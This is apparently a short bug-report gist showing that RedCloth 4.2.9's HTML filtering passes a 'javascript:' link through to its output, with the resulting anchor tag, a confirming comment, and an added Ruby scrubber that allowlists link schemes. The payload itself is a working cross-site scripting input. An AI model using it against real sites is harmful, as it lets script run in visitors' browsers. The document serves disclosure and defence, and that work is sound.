require 'redcloth'
print RedCloth.new('["clickme":javascript:alert%28/XSS/.source%29]', [:filter_html, :filter_styles, :filter_classes, :filter_ids]).to_html
# Result:
# <p><a href="javascript:alert%28/XSS/.source%29">clickme</a></p>
@co3k
Owner
co3k commented Feb 29, 2012

I've confirmed this with RedCloth-4.2.9 (installed by RubyGems).
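
A mitigation sketch for the output shown above, added here as an example (it is not part of the original gist or of RedCloth): post-process the generated HTML and neutralize every `href` whose scheme is not on an allowlist. The function names and the allowlist are assumptions, and the regex relies on double-quoted `href` attributes as in the result above.

```ruby
require 'cgi'

# Assumed policy: the only schemes a link may carry.
ALLOWED_SCHEMES = %w[http https mailto].freeze

# The HTML from the result above, embedded so the example runs without RedCloth.
POC_OUTPUT = '<p><a href="javascript:alert%28/XSS/.source%29">clickme</a></p>'

# True when the href is a relative reference or uses an allowed scheme.
def safe_href?(raw)
  # Browsers decode character references and drop tabs, newlines and
  # control characters before parsing the scheme, so normalize first.
  url = CGI.unescapeHTML(raw).gsub(/[\x00-\x20\x7f]/, '')
  # A scheme can only appear before the first '/', '?' or '#'.
  head = url[/\A[^\/?#]*/]
  # No ':' and no undecoded '&' there: plain relative reference.
  return true unless head =~ /[:&]/
  # Otherwise deny unless a well-formed, allowlisted scheme is present.
  scheme = head[/\A([a-z][a-z0-9+.\-]*):/i, 1]
  !scheme.nil? && ALLOWED_SCHEMES.include?(scheme.downcase)
end

# Replaces disallowed href values with "#" and leaves the rest untouched.
def scrub_links(html)
  html.gsub(/href="([^"]*)"/i) { |attr| safe_href?($1) ? attr : 'href="#"' }
end

puts scrub_links(POC_OUTPUT)
```

The check is deny-by-default: anything that looks like it could be a scheme but does not parse as an allowlisted one is rejected, which also covers entity-obfuscated variants that `CGI.unescapeHTML` does not decode.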
